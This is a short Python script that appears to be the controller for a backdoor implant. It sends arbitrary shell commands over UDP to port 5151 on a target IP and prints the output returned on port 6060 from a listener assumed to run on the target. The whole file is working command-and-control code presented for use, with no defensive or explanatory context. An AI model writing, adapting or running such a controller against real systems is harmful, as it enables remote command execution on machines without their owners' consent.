#!/usr/bin/python3
import sys, socket

commands = ['execute']

if len(sys.argv) <2:
	print("USAGE: " + sys.argv[0] + " [IP]  " + str(commands))
	sys.exit()

ip = sys.argv[1]

def execute(command):
	try:
		sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
		sock.sendto(bytes(command, 'utf-8'), (ip, 5151))
		respSock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
		respSock.bind(('0.0.0.0', 6060))
		respSock.settimeout(15)
		try:
			response = respSock.recvfrom(4096)
			output = response[0]
			print(output.decode('utf-8'))
		except socket.timeout:
			print("UwU, looks like there's no listener")
	
	except socket.gaierror:
		print("OWO (notices lack of internet connection)")

if sys.argv[2] in commands:
	instruction = sys.argv[2]
	if instruction == 'execute':
		shellCom = sys.argv[3]
		for x in range(4, len(sys.argv)):
			shellCom = shellCom + " " + sys.argv[x]
		execute(shellCom)
else:
	print("USAGE: " + sys.argv[0] + " [IP] " + str(commands))
	sys.exit()
